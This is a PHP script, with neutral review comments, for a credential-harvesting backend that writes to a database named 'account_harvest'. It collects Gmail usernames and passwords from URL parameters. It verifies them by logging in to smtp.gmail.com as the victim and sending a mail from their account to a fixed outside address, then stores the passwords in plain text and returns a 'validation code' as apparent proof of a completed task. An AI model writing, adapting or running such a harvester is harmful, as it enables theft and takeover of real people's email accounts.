<?php
require_once 'swiftmailer/lib/swift_required.php';
// MySQL connection settings used by the request handler below.
// The username and password values are placeholders that must be filled in
// before the script can connect.
$DATABASE_HOST = 'localhost';
$DATABASE_USERNAME = 'ENTER_DATABASE_USERNAME_HERE';
$DATABASE_PASSWORD = 'ENTER_DATABASE_PASSWORD_HERE';
// Schema and table names. Both are interpolated directly into SQL text further
// down; they are fixed strings here, not request input.
$DATABASE = 'account_harvest';
$TABLE = 'harvest';
/**
 * Report whether $haystack finishes with $needle.
 *
 * An empty $needle is treated as matching any $haystack. The comparison is
 * byte-wise and case-sensitive.
 *
 * @param string $haystack text to inspect
 * @param string $needle   suffix to look for
 * @return bool true when $haystack ends with $needle (or $needle is empty)
 */
function endsWith($haystack, $needle)
{
    // Guard first: the empty suffix always matches.
    if ($needle === "") {
        return true;
    }

    // Take as many trailing bytes as the suffix has and compare strictly.
    $suffixLength = strlen($needle);
    $tail = substr($haystack, -$suffixLength);

    return $tail === $needle;
}
// Request handler: reads four query-string fields, tries to authenticate to
// smtp.gmail.com with the submitted username/password, and on success stores
// the pair in MySQL and emits a JSON object describing the outcome.
//
// Review notes (data handling and observable traces):
// - All four fields, including the password, are read from $_GET, i.e. they
//   travel in the URL. URLs are commonly recorded in web-server access logs,
//   proxy logs and browser history, so the password is likely to be copied to
//   places this script does not control.
// - The password is written to the table exactly as submitted (TEXT column,
//   no hashing or encryption), so any read access to the table exposes it.
// - Verification is performed by signing in to smtp.gmail.com:465 as the
//   submitted account and sending a message from it. For the mailbox owner,
//   that sign-in and the outgoing message (subject "Hello", body
//   "This is a test mail.", recipient robert@sharklasers.com) are the traces
//   this script leaves on the account.
// - The mysql_* functions used here were deprecated in PHP 5.5 and removed in
//   PHP 7.0.
//
// Default response; each branch visible below assigns its own replacement.
$response = array(
"success" => false,
"message" => "An unknown error occurred."
);
// All four parameters must be present. isset() does not reject empty strings,
// so blank values pass this check.
if (isset($_GET["first_name"]) && isset($_GET["last_name"]) && isset($_GET["username"]) && isset($_GET["password"])) {
$firstName = trim($_GET["first_name"]);
$lastName = trim($_GET["last_name"]);
$username = trim($_GET["username"]);
// A username without the suffix is turned into a full address.
if (!endsWith($username, '@gmail.com')) {
$username = $username . '@gmail.com';
}
// trim() also strips leading/trailing whitespace from the password itself.
$password = trim($_GET["password"]);
// check input against creds in database
// NOTE(review): the mysql_* calls below report failure through return values
// and warnings rather than exceptions, so the outer catch at the end of this
// block is unlikely to be reached by a database error.
try {
// '@' suppresses the connection warning; failure is detected via the falsy
// return value instead.
$checkconnection = @mysql_connect($DATABASE_HOST, $DATABASE_USERNAME, $DATABASE_PASSWORD);
if (!$checkconnection) {
$response = array(
"success" => false,
"message" => "Could not connect to database, please try again in a few minutes."
);
} else {
// Select the database and create the table if it is not already there.
// Neither return value is checked.
mysql_select_db($DATABASE);
$createDBIfNotExistsSQL = "CREATE TABLE IF NOT EXISTS $TABLE (id INTEGER NOT NULL AUTO_INCREMENT, first_name TEXT, last_name TEXT, username TEXT, password TEXT, validation_code TEXT, PRIMARY KEY (Id));";
mysql_query($createDBIfNotExistsSQL);
// Check whether this username has been stored before.
// NOTE(review): the value is escaped and concatenated into the statement rather
// than bound as a parameter, and the query result is passed to
// mysql_num_rows() without first being checked for false.
$selectUsernameSQL = "SELECT id FROM $DATABASE.$TABLE where username='" . mysql_real_escape_string($username) . "';";
$selectUsernameResult = mysql_query($selectUsernameSQL);
if (mysql_num_rows($selectUsernameResult) > 0) {
$response = array(
"success" => false,
"message" => "These credentials have already been submitted."
);
} else {
// validate credentials
try {
// SMTP over SSL on port 465, authenticating as the submitted account.
$transport = Swift_SmtpTransport::newInstance('smtp.gmail.com', 465, "ssl")
->setUsername($username)
->setPassword($password);
$mailer = Swift_Mailer::newInstance($transport);
// need to send an actual email to test authentication
// The message is sent from the submitted address to a fixed recipient.
$message = Swift_Message::newInstance('Hello')
->setFrom(array($username => ($firstName . " " . $lastName)))
->setTo(array('robert@sharklasers.com'))
->setBody('This is a test mail.');
// NOTE(review): $result is assigned but never read; only the absence of an
// exception is treated as success.
$result = $mailer->send($message);
// no exceptions at this point so the credentials must be good
// The code is sha1 over the constant "salty" followed by the username, so it
// is deterministic and derivable from the username alone.
$validationCode = sha1("salty" . $username);
// Every value is escaped and concatenated; the password is stored as submitted.
// The return value of the INSERT is not checked, so the success response
// below is sent even if the row was not written.
$insertSQL = "INSERT INTO $DATABASE.$TABLE (first_name,last_name,username,password,validation_code) VALUES ('" . mysql_real_escape_string($firstName) . "','" . mysql_real_escape_string($lastName) . "','" . mysql_real_escape_string($username) . "','" . mysql_real_escape_string($password) . "','" . mysql_real_escape_string($validationCode) . "');";
mysql_query($insertSQL);
$response = array(
"success" => true,
"message" => "Task completed successfully!",
"validation_code" => $validationCode
);
}
// Any exception raised inside the inner try (authentication, network or
// otherwise) is reported with the same message.
catch (Exception $e1) {
// echo 'Caught exception: ', $e->getMessage(), "\n";
// (the disabled line above refers to $e, but the caught variable is $e1)
$response = array(
"success" => false,
"message" => "Could not validate credentials."
);
}
}
}
}
catch (Exception $e2) {
$response = array(
"success" => false,
"message" => "Could not save credentials, please try again in a few minutes."
);
}
} else {
$response = array(
"success" => false,
"message" => "Required fields (first name, last name, username, password) are missing."
);
}
// The JSON body is the script's only output; no Content-Type header is set in
// the code shown here.
echo json_encode($response);
?>